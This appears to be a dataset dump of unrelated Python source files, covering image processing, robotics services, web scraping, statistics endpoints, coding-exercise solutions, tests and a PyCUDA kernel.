text
stringlengths 8
6.05M
|
|---|
def isAnagram(test, original):
""" is_anagram == PEP8 (forced mixedCase by CodeWars) """
return sorted(a for a in test.lower() if a.isalnum()) \
== sorted(b for b in original.lower() if b.isalnum())
|
import hashlib
import os
import requests
import exifread
from pathlib import PurePath
from datetime import datetime
url = 'http://192.168.0.114:8880/photos/'
sourceDir = 'BookLive/Public/Shared Pictures/Scan'
destDir = '/volume1/photo'
def hash_file(filename):
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
# open file for reading in binary mode
with open(filename,'rb') as file:
# loop till the end of the file
chunk = 0
while chunk != b'':
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
def getDir(filename, dateTaken):
"""This function takes the filename and date taken
create a dir name dest folder will be YYYY/MM/DD/filename
If EXIF is unavailable, then the folder should be
destFolder/filename"""
if dateTaken is None or tags is None:
return PurePath(destDir, PurePath(filename).parent.name, PurePath(filename).name)
return PurePath(destDir, dateTaken[:4], dateTaken[5:7], dateTaken[8:10], PurePath(filename).name)
print(sourceDir)
for root, dirs, files in os.walk(sourceDir, topdown=False):
print(root)
if "@eaDir" in root:
continue
print(root)
hashes = {}
for name in files:
# Iterate through the all files, calculate MD5 hash of each file
# Check the hash in DB, if the hash already there, we have duplicate
# If not, create the new record and copy the file
# Destination dir is determined from EXIF: if EXIF data exist
# the destination directory will be YYYY/MM/DD
# If the EXIF doesn't exist, the destination directory will
# be the same as source dir
hashcode = hash_file(os.path.join(root, name))
result = requests.get(url + hashcode)
if result.status_code == 200:
print(os.path.join(root, name) + ' already present')
continue
#So, hash is unique, lets figure the destination dir
with open(os.path.join(root, name), 'rb') as f:
tags = exifread.process_file(f, details=False)
dateTaken = None
if tags and 'EXIF DateTimeOriginal' in tags:
dateTaken = str(tags['EXIF DateTimeOriginal'])[:10].replace(":", "-") + 'T' + str(tags['EXIF DateTimeOriginal'])[11:]
destFileName = getDir(name, dateTaken)
if dateTaken is None:
dateTaken = datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
print(destFileName)
#result = requests.post(url, json = {"name": name, "path": root, "hash": hashcode, "dateTaken": dateTaken})
#shutil.move(root / name, destFileName)
|
from skimage import io
from skimage.transform import downscale_local_mean
from skimage.filters import threshold_sauvola as threshold
from skimage.segmentation import clear_border, random_walker
from skimage.measure import label, regionprops
from skimage.morphology import binary_opening, square, remove_small_objects
from skimage.color import gray2rgb
from skimage.draw import circle
import config
from mpyx.F import EZ, As, By, F, Datagram
# from mpyx.F import Serial, Parallel, Broadcast, S, P, B
# from mpyx.F import Iter, Const, Print, Stamp, Map, Filter, Batch, Seq, Zip, Read, Write
# from mpyx.Vid import BG
from mpyx.Vid import FFmpeg
# from mpyx.Compress import VideoFile, VideoStream
from lib.Database import Database, DBWriter
from lib.Crop import Crop
from dateutil.parser import parse as dateparse
from base64 import b64encode
from itertools import repeat
from PIL import Image
from io import BytesIO
from uuid import uuid4
# import matplotlib.pyplot as plt
import numpy as np
import traceback
import multiprocessing
import subprocess
import threading
import concurrent.futures
import shutil
import shlex
import pexpect
import queue
import asyncio
import fcntl
import tempfile
import time
import os
import sys
import cv2
# import matplotlib.pyplot as plt
async def main(args):
if len(args) < 2:
print("""path/to/video/file.avi 2017-10-31 Name-of_video "Notes. Notes." """)
else:
print(await detect_video(*args))
async def detect_video(video_file, date, name="Today", notes=""):
cpus = multiprocessing.cpu_count()
experiment_uuid = uuid4()
experiment_day = dateparse(date)
experiment_dir = os.path.join(config.experiment_dir, str(experiment_uuid))
experiment = (experiment_uuid, experiment_day, name, "detection", notes)
try:
print("Creating data directory", experiment_dir)
os.mkdir(experiment_dir)
scaleby = 1
w, h = int(2336 / scaleby), int(1729 / scaleby)
# Reads the source video, outputs frames
print("Launching Video Reader")
video_reader = FFmpeg(
video_file,
"",
(h, w, 1),
"-ss 00:00:02.00 -t 00:00:00.50 -vf scale={}:{}".format(w, h),
[],
False,
FrameData,
)
print("Launching Database processor")
db_proc = DB_Processor(experiment_uuid, experiment_day, name, notes)
print("Launching Entry processor")
entry_proc = Entry(experiment_uuid)
print("Launching Magic pixel processor")
magic_proc = MagicPixel()
print("Launching Rescale processor")
rescale_proc = Rescaler()
# Computes a background for a frame, outputs {"frame": frame, "bg": bg}
print("Launching Background Modeler")
bg_proc = BG(model="simpleMax", window_size=50, img_shape=(h, w, 1))
# Takes a background and a frame, enhances frame to model foreground
print("Launching Foreground Modeler")
fg_proc = FG()
# Takes a foreground frame, binarizes it
print("Launching Binary Mask Processor")
mask_proc = Binary("legacyLabeled")
print("Launching Properties Processor")
prop_proc = Properties()
print("Launching Crop Processor")
crop_proc = Crop_Processor()
# A utility to view video pipeline output
raw_player = RawPlayer()
bg_player = BGPlayer()
fg_player = FGPlayer()
mask_player = MaskPlayer()
crop_player = CropPlayer()
meta_player = MetaPlayer()
# A utility to clean up datagram resources
cleaner = Cleaner()
# Todo
# print("Launching Crop Writer")
# print("Launching Detection Video Writer")
# print("Launching Particle Commmitter")
# /todo
EZ(
video_reader,
entry_proc,
magic_proc,
meta_player,
rescale_proc,
raw_player,
bg_proc,
fg_proc,
mask_proc,
cleaner,
).start().join()
except Exception as e:
print("Uh oh. Something went wrong")
traceback.print_exc()
# wq.push(None)
if os.path.exists(experiment_dir):
print("Removing files from", experiment_dir)
shutil.rmtree(experiment_dir)
else:
pass
# dbwriter.commit()
# wq.push(None)
finally:
print("Fin.")
return experiment_uuid
class Cleaner(F):
def do(self, frame):
frame.clean()
class RawPlayer(F):
def do(self, frame):
cv2.imshow("Raw Display", frame.raw)
self.put(frame)
cv2.waitKey(1000 // 24)
class FGPlayer(F):
def do(self, frame):
cv2.imshow("FG Display", frame.fg)
self.put(frame)
cv2.waitKey(1000 // 24)
class MaskPlayer(F):
def do(self, frame):
cv2.imshow("Mask Display", 1.0 * frame.mask)
self.put(frame)
cv2.waitKey(1000 // 24)
class BGPlayer(F):
def do(self, frame):
cv2.imshow("BG Display", frame.bg)
self.put(frame)
cv2.waitKey(1000 // 24)
class CropPlayer(F):
def do(self, frame):
crops = frame.crops
crop_h = crops.shape[1]
crop_w = crops.shape[2]
crops_n = crops.shape[0]
disp_w_n = 30
disp_h_n = int(np.ceil(crops_n / disp_w_n))
disp_w = int(disp_w_n * crop_w)
disp_h = int(disp_h_n * crop_h)
disp = np.zeros((disp_h, disp_w))
# print("------------------")
# print("crops:", crops.shape)
# print("crop_h", crop_h)
# print("crop_w", crop_w)
# print("crops_n", crops_n)
# print("disp_w", disp_w)
# print("disp_h", disp_h)
for i in range(disp_h_n):
for j in range(disp_w_n):
n = i * disp_h_n + j
if n == crops_n:
break
disp[
i * crop_h : i * crop_h + crop_h, j * crop_w : j * crop_w + crop_w
] = crops[n].squeeze()
cv2.imshow("Crop Display", disp)
self.put(frame)
cv2.waitKey(1000 // 24)
class MetaPlayer(F):
def do(self, frame):
print(
"Experiment:",
frame.experiment_uuid,
", Segment:",
frame.segment_uuid,
" Number:",
frame.number,
" Segment Number:",
frame.segment_number,
)
self.put(frame)
class Entry(F):
def initialize(self, experiment_uuid):
self.experiment_uuid = experiment_uuid
self.count = 0
def do(self, frame):
frame.experiment_uuid = self.experiment_uuid
frame.number = self.count
frame.uuid = uuid4()
self.count = +1
frame.raw = frame.raw / 255
self.put(frame)
class MagicPixel(F):
# Not sure this works currently...
def do(self, frame):
magic_pixel = 255
magic_pixel_delta = 0.1
segment_number = -1
raw = frame.raw
if config.use_magic_pixel_segmentation:
this_frame_magic_pixel = raw[0, 4, 0]
if abs(this_frame_magic_pixel - magic_pixel) > magic_pixel_delta:
print("Segment Boundry Detected")
segment_number += 1
segment = (uuid4(), frame.experiment_uuid, segment_number)
magic_pixel = this_frame_magic_pixel
frame.segment_uuid = segment[0]
frame.segment_number = segment[2]
self.put(frame)
from skimage.transform import rescale
class Rescaler(F):
def do(self, frame):
frame.raw = rescale(frame.raw, 0.5)
self.put(frame)
import math
from collections import deque
class BG(F):
def setup(self, model="median", window_size=20, *args, env=None, **kwArgs):
self.frame_que = deque(maxlen=window_size)
self.window_size = window_size
# self.q_len = math.ceil(window_size / 2)
# self.q_count = 0
self.model = getattr(self, model)(window_size=window_size, *args, **kwArgs)
def do(self, frame):
# import cv2
# from uuid import uuid4
self.frame_que.append(frame)
# self.q_count += 1
self.bg = self.model.process(frame.raw)
# cv2.imwrite('/home/mot/tmp/bg_'+str(uuid4())+'.png', self.bg)
if len(self.frame_que) > self.window_size:
# bg = self.que.popleft()
frame = self.frame_que.popleft()
frame.bg = self.bg
self.put(frame)
def teardown(self):
while len(self.frame_que) > 0:
# self.q_count -= 1
frame = self.frame_que.popleft()
frame.bg = self.bg
self.put(frame)
class simpleMax:
def __init__(self, window_size=20, img_shape=None):
# print("simpleMax maxlen: "+str(math.ceil(window_size / 2)-5))
self.window_size = window_size
self.que = deque(maxlen=window_size)
self.bg = None
def process(self, frame):
# like erosion, but faster
from skimage.filters.rank import minimum
# parameter: minimum lighting (dynamic range), threshold below
min_range = 20
if len(self.que) < self.window_size:
self.que.append(frame)
elif len(self.que) == self.window_size:
# print("computing bg...")
if self.bg is None:
bg = np.max(self.que, axis=0)
bg[bg < min_range] = 0
bg = minimum(bg.squeeze(), square(8))
bg = np.expand_dims(bg, axis=-1)
self.bg = bg
return self.bg
class FG(F):
def setup(self, model="division", *args, **kwargs):
# If your process needs to do any kind of setup once it has been forked,
# or if it the first process in a workflow and expected to generate
# values for the rest of the pipeline, that code should go here.
self.model = getattr(self, model)()
def do(self, frame):
# The main workhorse of a process. Items will flow in here, potentially
# be modified, mapped, reduced, or otherwise morgified, and output can
# be then pushed downstream using the self.put() method.
# Here, for example, any items are simply passed along.
frame.fg = self.model.process(frame)
self.put(frame)
class division:
def __init__(self):
pass
def process(self, frame):
"""
Expects a dict with bg, frame
"""
eps = 0.0001
div = frame.raw / (frame.bg + eps)
# div[np.isnan(div)] = 1.0 # get rid of nan's from 0/0
return np.clip(div, 0, 1)
from skimage.filters import threshold_sauvola
from skimage.morphology import binary_opening, remove_small_objects, square, erosion
from skimage.segmentation import clear_border
class Binary(F):
def setup(self, model="simple", *args, **kwargs):
# If your process needs to do any kind of setup once it has been forked,
# or if it the first process in a workflow and expected to generate
# values for the rest of the pipeline, that code should go here.
self.model = getattr(self, model)(*args, **kwargs)
def do(self, frame):
# The main workhorse of a process. Items will flow in here, potentially
# be modified, mapped, reduced, or otherwise morgified, and output can
# be then pushed downstream using the self.put() method.
# Here, for example, any items are simply passed along.
frame.mask = self.model.process(frame)
self.put(frame)
class legacyLabeled:
def __init__(self, threshold=0.5):
self.threshold = threshold
def process(self, frame):
# Take the center, removing edge artifacts
# frame = frame[200:-200, 200:-200]
sframe = frame.fg.squeeze()
binary = sframe < self.threshold
binary = binary_opening(binary, square(3))
binary = clear_border(binary)
# opened = binary_opening(binary, square(3))
# cleared = clear_border(opened)
return binary
from skimage.measure import label, regionprops
class Properties(F):
def do(self, frame):
labelled = label(frame.mask)
frame.regionprops = regionprops(labelled, frame.fg.squeeze())
frame.track_uuids = [uuid4() for i in range(len(properties))]
self.put(frame)
from lib.Crop import Crop
class Crop_Processor(F):
def do(self, frame):
regionprops = frame.regionprops
cropper = Crop(frame.fg)
coords = [(p.centroid[1], p.centroid[0]) for p in regionprops]
bboxes = [((p.bbox[1], p.bbox[0]), (p.bbox[3], p.bbox[2])) for p in regionprops]
crops = np.array(
[cropper.crop(int(round(c[0])), int(round(c[1]))) for c in coords]
)
frame.crops = crops
self.put(frame)
class Crop_writer(F):
def do(self, frame):
crops = frame.crops
class FrameData(Datagram):
def initialize(self):
self.experiment_uuid = None
self.segment_uuid = None
self.segment_number = None
self.uuid = None
self.number = None
class DB_Processor(F):
async def initialize(
self, experiment_uuid, experiment_day, name, notes, verbose=False
):
self.verbose = verbose
self.experiment_uuid = experiment_uuid
self.experiment_day = experiment_day
self.name = name
self.notes = notes
self.tx, self.transaction = await Database().transaction()
self.csv_files = [
"/tmp/{}_segment.csv",
"/tmp/{}_frame.csv",
"/tmp/{}_track.csv",
"/tmp/{}_particle.csv",
]
def add_segment(self, frame):
data = (frame.segment_uuid, frame.experiment_uuid, frame.segment_number)
s = "{}\t{}\t{}\n"
with open("/tmp/{}_segment.csv".format(self.experiment_uuid), "a") as f:
for g in [data]:
f.write(s.format(segment[0], segment[1], segment[2]))
def add_frame(self, frame):
data = (frame.uuid, frame.experiment_uuid, frame.segment_uuid, frame.number)
s = "{}\t{}\t{}\t{}\n"
with open("/tmp/{}_frame.csv".format(self.experiment_uuid), "a") as f:
for g in [data]:
f.write(s.format(g[0], g[1], g[2], g[3]))
def add_detections(self, frame):
regionprops = frame.regionprops
DEFAULT_CATEGORY = 1 # set to unknown for now
particles = [
(
uuid4(),
self.experiment_uuid,
p.area,
p.mean_intensity,
p.perimeter,
p.major_axis_length,
p.minor_axis_length,
p.orientation,
p.solidity,
p.eccentricity,
DEFAULT_CATEGORY,
)
for i, p in enumerate(regionprops)
]
coords = [(p.centroid[1], p.centroid[0]) for p in regionprops]
bboxes = [((p.bbox[1], p.bbox[0]), (p.bbox[3], p.bbox[2])) for p in regionprops]
track_uuids = frame.track_uuids
tracks = [
(track_uuids[i], frame_uuid, p[0], coords[i], bboxes[i])
for i, p in enumerate(regionprops)
]
s = "{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\n"
with open("/tmp/{}_particle.csv".format(self.experiment_uuid), "a") as f:
for p in particles:
f.write(
s.format(
p[0],
p[1],
p[2],
p[3],
p[4],
p[5],
p[6],
p[7],
p[8],
p[9],
p[10],
)
)
s = "{}\t{}\t{}\t{}\t{}\n"
with open("/tmp/{}_track.csv".format(self.experiment_uuid), "a") as f:
for t in tracks:
f.write(s.format(t[0], t[1], t[2], t[3], t[4]))
def do(self, sql_drop):
method, query, args = sql_drop
if self.verbose:
print("DBWriter Exiting")
async def teardown(self):
if self.verbose:
print("Inserting experiment into database.")
await tx.execute(
"""
INSERT INTO Experiment (experiment, day, name, method, notes)
VALUES ($1, $2, $3, $4, $5)
""",
self.experiment_uuid,
self.experiment_day,
self.name,
"DetectionMpyxDatagram",
self.notes,
)
if self.verbose:
print("Inserting segments into database.")
await self.tx.execute(
"""
COPY segment FROM '/tmp/{}_segment.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting frames into database.")
await self.tx.execute(
"""
COPY frame FROM '/tmp/{}_frame.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting particles into database.")
await self.tx.execute(
"""
COPY particle (particle, experiment, area, intensity, perimeter, major, minor, orientation, solidity, eccentricity, category\n)FROM '/tmp/{}_particle.csv' DELIMITER '\t' CSV;
""".format(
self.experiment_uuid
)
)
if self.verbose:
print("Inserting tracks into database.")
await tx.execute(
"""
COPY track (track, frame, particle, location, bbox\n) FROM '/tmp/{}_track.csv' DELIMITER '\t' CSV;
""".format(
experiment_uuid
)
)
await self.transaction.commit()
for f in csv_files:
if os.path.isfile(f.format(self.experiment_uuid)):
os.remove(f.format(self.experiment_uuid))
|
#!/usr/bin/env python
import math
import rospy
from myturtle.srv import *
from nav_msgs.msg import Odometry
class LandmarkMonitor(object):
def __init__(self):
self._benda = {
"Cube":(0.31,-0.99),
"Dumpster":(0.11,-2.42),
"Cylinder":(-1.14,-2.88),
"Barrier":(-2.59,-0.83),
"Bookshelf":(-0.09,0.53)
}
self._x = 0
self._y = 0
def get_closest(self, req):
rospy.loginfo('GetClosest called')
best_landmark= ''
best_distance=-1
for name, (x, y) in self._benda.items():
dx = x - self._x
dy = y - self._y
sq_dist = dx*dx + dy*dy
if best_distance == -1 or sq_dist < best_distance:
best_distance = sq_dist
best_landmark = name
response = GetClosestResponse()
response.name = best_landmark
return response
def get_distance(self, req):
rospy.loginfo('GetDistance called with {}'.format(req.name))
if req.name not in self._benda:
rospy.logerr('Tidak dikenali "{}"'.format(req.name))
return None
x, y = self._benda[req.name]
dx = x - self._x
dy = y - self._y
response = GetDistanceResponse()
response.distance = math.sqrt(abs(dx*dx+dy*dy))
return response
def odom_callback(self, msg):
self._x = msg.pose.pose.position.x
self._y = msg.pose.pose.position.y
def main():
rospy.init_node('landmark_server')
monitor = LandmarkMonitor()
get_closest = rospy.Service('get_closest', GetClosest, monitor.get_closest)
get_distance = rospy.Service('get_distance', GetDistance, monitor.get_distance)
sub = rospy.Subscriber('/odom', Odometry, monitor.odom_callback)
rospy.spin()
if __name__=='__main__':
main()
|
# https://github.com/hflabs/dadata-py
from dadata import Dadata
token = "" # Токен с сервиса DaData
secret = "" # Секретный ключ с сервиса DaData
def check(name,query):
dadata = Dadata(token, secret) # Данные для авторизации в сервисе DaData
infoCompany = dadata.find_by_id(name, query) # Поиск информации о компании
if infoCompany[0]['data']['type'] == 'LEGAL':
print(infoCompany[0]['data']['name']['full']) # Названия компании
print(infoCompany[0]['data']['type']) # Тип компании
print(infoCompany[0]['data']['opf']['full']) # Полный префикс компании
print(infoCompany[0]['data']['opf']['short']) # Короткий префикс компании
print(infoCompany[0]['data']['address']['data']['region_type_full']) # Тип региона
print(infoCompany[0]['data']['address']['data']['region']) # Название региона
print(infoCompany[0]['data']['address']['data']['city_type']) # Название города
print(infoCompany[0]['data']['address']['data']['city']) # Название города
print(infoCompany[0]['data']['address']['data']['street_type_full']) # Тип улица/проспект
print(infoCompany[0]['data']['address']['data']['street']) # Название улицы
print(infoCompany[0]['data']['address']['data']['house_type_full']) # Тип улица/проспект
print(infoCompany[0]['data']['address']['data']['house']) # Название улицы
else:
print(infoCompany[0]['data']['name']['full']) # Названия компании
print(infoCompany[0]['data']['type']) # Тип компании
print(infoCompany[0]['data']['opf']['full']) # Полный префикс компании
print(infoCompany[0]['data']['opf']['short']) # Короткий префикс компании
print(infoCompany[0]['data']['address']['data']['region_type_full']) # Тип региона
print(infoCompany[0]['data']['address']['data']['region']) # Название региона
check(name='party', query='0274940895') # Проверка компании по ИНН 0274940895
|
s = 0
v = 0
for c in range(1, 7, 1):
n = int(input(f'Digite o {c}° valor: '))
if n % 2 == 0:
s += n
v += 1
print(f'A soma de todos os {v} valores vale {s}')
|
import urllib.request # 웹브라우저에서 html문서를 얻어오기 위한 모듈
from bs4 import BeautifulSoup # html문서 검색 모듈
import os
from selenium import webdriver # 웹 애플리케이션의 테스트를 자동화하기 위한 프레임 워크
from selenium.webdriver.common.keys import Keys
import time
filename = '학사공지'
chrome = 'c:\\data\\chromedriver.exe'
browser = webdriver.Chrome(chrome) # 웹브라우저 인스턴스화
browser.get('https://www.duksung.ac.kr/bbs/board.do?bsIdx=35&menuId=1058')
time.sleep(1)
def get_save_path():
save_path = 'C:\\data\\덕성여대공지사항\\{}.txt'.format(filename) # 4
if not os.path.isdir(os.path.split(save_path)[0]):
os.mkdir(os.path.split(save_path)[0]) # 지정된 경로에 파일이 없으면 만들어라
return save_path
def fetch_list_url():
params = []
# for cnt in range(1, 5):
browser.find_element_by_xpath("//body") # 페이지 활성화
html = browser.page_source # 현재 페이지 소스 담기 즉 1페이지
soup = BeautifulSoup(html, "lxml")
for i in soup.find_all('div', class_='table-responsive'):
params.append('http://www.duksung.ac.kr' + i('a')[0]['href']) # find_all은 리스트로 담아준다. 그래서[0]이 필요
list_url = 'http://www.duksung.ac.kr' + soup.find_all('div', class_='table-responsive')[0]('a')[0]['href']
#print('\n', list_url)
for i in range(9):
list_url = 'http://www.duksung.ac.kr' + soup.find_all('div', class_='table-responsive')[0]('a')[i]['href']
print('\n', list_url)
url = urllib.request.Request(list_url)
res = urllib.request.urlopen(url).read().decode('utf-8')
soup2 = BeautifulSoup(res, 'html.parser') # res html문서를 BeautifulSoup모듈을 사용해서 검색하도록 설정
for i in soup2.find_all('td', class_='text-left'):
params.append('http://www.duksung.ac.kr' + i('a')[0]['href'])
print(params) # 페이지 내의 뉴스 웹주소 다 담긴다.
browser.quit()
return params
def fetch_list_url2():
params2 = fetch_list_url()
f = open(get_save_path(), 'w', encoding='utf-8') # get_save_path()를 인스턴스화!!
for i in params2:
list_url = "{}".format(i)
url = urllib.request.Request(list_url)
res = urllib.request.urlopen(url).read().decode('utf-8')
soup = BeautifulSoup(res, "html.parser") # res html문서를 BeautifulSoup모듈을 사용해서 검색하도록 설정
article1 = soup('div', class_= 'panel-title view-title h5')[0].get_text(strip=True, separator='\n')
article2 = soup('div', class_='bbs_memo')[0].get_text(strip=True, separator='\n')
# loop돌면서 기사가 계속 바뀐다.
f.write(article1 + article2 + '\n'*2 + '='.ljust(50, '=') + '\n') # 기사 바뀌면서 계속 적어라!
f.close()
fetch_list_url2()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-07-09 22:37:34
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import os
class Solution:
def intersection(nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
set1 = set(nums1)
resultSet = set([])
for i in nums2:
if i in set1:
resultSet.add(i)
return list(resultSet)
if __name__=='__main__':
print(Solution.intersection([],[]))
|
#!/usr/bin/env python
"""Test suite for the ``accuracy`` module"""
import numpy as np
from pytest import raises
from accuracy import accuracy
def test_error_length():
y_pred = np.array([False, True, True])
y_true = np.array([True, False])
raises(AssertionError, accuracy, y_pred, y_true)
def test_basic():
y_true = np.array([True, False, True, True, False])
y_pred = np.array([True, True, False, True, False])
acc = accuracy(y_true, y_pred)
reference = 3. / 5.
assert acc == reference
def test_basic_balanced():
y_true = np.array([True, True, True, False, False])
y_pred = np.array([True, True, False, True, False])
acc = accuracy(y_true, y_pred, balanced=True)
reference = ((2. / 3.) + (1. / 2.)) / 2.
assert acc == reference
def test_all_positives():
y_true = np.ones((5), dtype=bool)
y_pred = np.random.randn(y_true.size)
y_pred -= y_pred.min()
y_pred += 1.
acc = accuracy(y_true, y_pred)
assert acc == 1.0
acc = accuracy(y_pred, y_true)
assert acc == 1.0
def test_all_negatives():
y_true = np.zeros((5), dtype=bool)
y_pred = ~y_true
acc = accuracy(y_pred, y_true)
assert acc == 0.0
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
from flask import Flask, jsonify
from flask import request
from scipy.stats import ttest_ind
app = Flask(__name__)
# 接口路由地址
@app.route('/sklearn', methods=['POST'])
def index():
import numpy as np
data = request.json
data = data["data"]
print(data)
print(data[0])
print(data[1])
for key1, value in data[0].items():
# list1.append(key)
global X
X = value
global name1
name1 = key1
for key2, value2 in data[1].items():
# list1.append(key)
global Y
Y = value2
global name2
name2 = key2
try:
# 均值
xx = np.mean(X)
yy = np.mean(Y)
# 均值差
if xx > yy:
jzc = xx - yy
else:
jzc = yy - xx
# 标准差
bzc = np.std(X, ddof=1)
bzc = round(bzc, 2)
bzc2 = np.std(Y, ddof=1)
bzc2 = round(bzc2, 2)
# 最小值
zxz = min(X)
zxz2 = min(Y)
# 最大值
zdz = max(X)
zdz2 = max(Y)
# 百分数数 5%位数
"""
第一步:排序
第二步:计算 百分位数所在区间上限下限,(数组索引从0开始),若下限等于本身,则减1
第三步:上下限即索引,根据索引求出区间,根据线性插值加下限值 即为所求百分位数
"""
X = sorted(X)
num = len(X)
N = num - 1
print(N)
# 计算百分位数
P = 75 # 百分位数
floor1 = int(np.floor(N / 100 * P))
ceil1 = int(np.ceil(N / 100 * P))
if floor1 == ceil1:
floor1 -= 1
bfw = X[floor1] + (X[ceil1] - X[floor1]) * (N / 100 * P - floor1) # also np.percentile(b,10)
Y = sorted(Y)
num2 = len(Y)
N2 = num2 - 1
print(N2)
# 计算百分位数
P2 = 75 # 百分位数
floor12 = int(np.floor(N2 / 100 * P2))
ceil12 = int(np.ceil(N2 / 100 * P2))
if floor12 == ceil12:
floor12 -= 1
bfw2 = X[floor12] + (X[ceil12] - X[floor12]) * (N2 / 100 * P2 - floor12) # also np.percentile(b,10)
# ttest_ind 默认为方差齐性的,equal_var = false 可以设置为方差不齐性。
t, p = ttest_ind(X, Y, equal_var=False)
print(ttest_ind(X, Y, equal_var=False))
except Exception as e:
e = str(e)
return jsonify(erro=e)
# return jsonify(yy={name1: {'N值': 12, '均值': xx, '标准差': bzc, '最小值': zxz, '75%位数': bfw, '最大值': zdz},
# name2: {'N值': 13, '均值': yy, '标准差': bzc2, '最小值': zxz2, '75%位数': bfw2, '最大值': zdz2},
# '配对t检验': {'均值差': jzc, 't值': round(t,2), 'p值': round(p, 8), '样本1均值': xx, '样本2均值': yy}
# })
return jsonify(yy={"data": [
{
"code": 0,
"message": None,
"varInfos": None,
"mData": None,
"fields": [],
"rFiles": [],
"tables": [{"parentTitle": "",
"parentContent": [],
"title": name1+"正态性检验",
"content": [],
"rowTop": "",
"colTop": "",
"rowNames": [1, 2],
"combination": False,
"colNames": ['N值', '均值', '标准差', '最小值', '75%位数', '最大值'],
"values": [[12, xx, bzc, zxz, bfw, zdz], [13, yy, bzc2, zxz2, bfw2, zdz2]]
},
{"parentTitle": "",
"parentContent": [],
"title": name1+"t检验",
"content": [],
"rowTop": "",
"colTop": "",
"rowNames": [1, 2],
"combination": False,
"colNames": ['均值差', 't值', 'p值', '样本1均值', '样本2均值'],
'values': [jzc, round(t, 2), round(p, 8), xx, yy]}
]
}]
})
if __name__ == '__main__':
app.run(debug=True)
# app.run(debug=True,host="192.168.11.220",port=5000)
|
#!/usr/bin/python
import time
import numpy as np
import sys
#tos stuff
from DecodedMsg import *
from tinyos.message import MoteIF
class MyClass:
def __init__(self,N):
self.prevtime = time.time()
self.N = N
self.A = make_A_matrix(self.N)
self.counter = 0;
self.perform_svd = 0;
# Create a MoteIF
self.mif = MoteIF.MoteIF()
# Attach a source to it
self.source = self.mif.addSource("sf@localhost:9002")
# SomeMessageClass.py would be generated by MIG
self.mif.addListener(self, DecodedMsg)
# Called by the MoteIF's receive thread when a new message
# is received
def receive(self, src, msg):
m = DecodedMsg(msg.dataGet())
self.counter = m.get_counter()
timeformat = '%Y/%d/%m %H:%M:%S'
print 'Received message %s: counter: %d' % (time.strftime(timeformat), self.counter)
if m.get_perform_svd() == self.N:
#print ' svd received:'
Svals = m.get_A()
print 'Rx svd: ', Svals
U,S,V = np.linalg.svd(self.A)
#S = [s**2 for s in S]
#print ' svd check:'
print 'PC svd: ', S
self.perform_svd = 0
self.A = make_A_matrix(self.N)
print 'MSE: ', np.linalg.norm(np.array(S)-np.array(Svals),2)
proctime = time.time() - self.prevtime
print 'Elapsed time: %f seconds' % proctime
else:
self.prevtime = time.time()
self.perform_svd += 1
self.counter += 1
self.send()
def send(self):
smsg = DecodedMsg()
smsg.set_counter(self.counter)
smsg.set_perform_svd(self.perform_svd)
if self.perform_svd:
smsg.set_A(self.A[self.perform_svd-1])
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
def make_A_matrix(N):
A = np.random.randn(N,N)
return A
if __name__ == "__main__":
print "Running"
if len(sys.argv) > 1:
N = int(sys.argv[1])
else:
N = 6
m = MyClass(N)
|
"""
Description: Given a string containing just the characters '(', ')', '{', '}',
'[' and ']', determine if the input string is valid.
An input string is valid if:
Open brackets must be closed by the same type of brackets.
Open brackets must be closed in the correct order.
NOTE: An empty string is also considered valid.
"""
class Solution(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
if len(s) % 2 != 0:
return False
dict_paren = {'(': ')', '{': '}', '[': ']'}
stack = []
for char in s:
# check if the char is opening parentheses
if char in dict_paren:
# add the closing pair
val = dict_paren[char]
stack.append(val)
else:
if char != stack.pop():
return False
return len(stack) == 0
s = ''
obj = Solution()
result = obj.isValid(s)
print(result)
|
#专门做小写字母
import pandas as pd
from Bio import SeqIO
df=pd.read_excel('ldes/sample4.xlsx')
stseq=[]
site=[]
nn = 0
for row in df.itertuples():
aimid = row[1]
aimseq = row[3]
if (aimseq.find('c')>-1) and (aimseq.find('h')==-1):
a=aimseq.find('c')
b=len(aimseq)-a
c=aimseq.upper()
try:
sseq = dictseq[aimid]
n=0
for n,AA in enumerate(sseq):
if ((AA=='C') and (c==sseq[n-a:n+b])):
aimsite=n+1
if aimsite < 26:
seq51 = (26-aimsite)*'*' + sseq[0:aimsite+25]
elif (aimsite+24) > len(sseq):
seq51 = sseq[aimsite-26:] + (25-(len(sseq)-aimsite))*'*'
else:
seq51 = sseq[aimsite-26:aimsite+25]
except:
seq51="error"
aimsite="error"
else:
seq51='error'
aimsite='error'
site.append(aimsite)
stseq.append(seq51)
nn=nn+1
print('蛋白质序列匹配中,目前已经运行至第',nn,'个',aimid,'数字为',len(site),len(stseq),seq51)
#while stseq.count('')>0:
#stseq.remove('')
df['site']=site
df['standard_sequence']=stseq
df.to_csv('ldes/rs4.csv')
print("运行完毕!")
|
# -*- coding: utf-8 -*-
"""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void add3d_local(float *a_local, float *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
"""
import numpy as np
import pycuda.driver as drv
import pycuda.autoinit
from pycuda.compiler import SourceModule
mod = SourceModule("""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void add3d_local(float *a_local, float *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__device__ __forceinline__ void add3d_local_d(double *a_local, double *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__global__ void add_helper_float(float *a_local, float *b){
add3d_local(a_local, b);
}
__global__ void add_helper_double(double *a_local, double *b){
add3d_local_d(a_local, b);
*a_local = 3.14;
}
""")
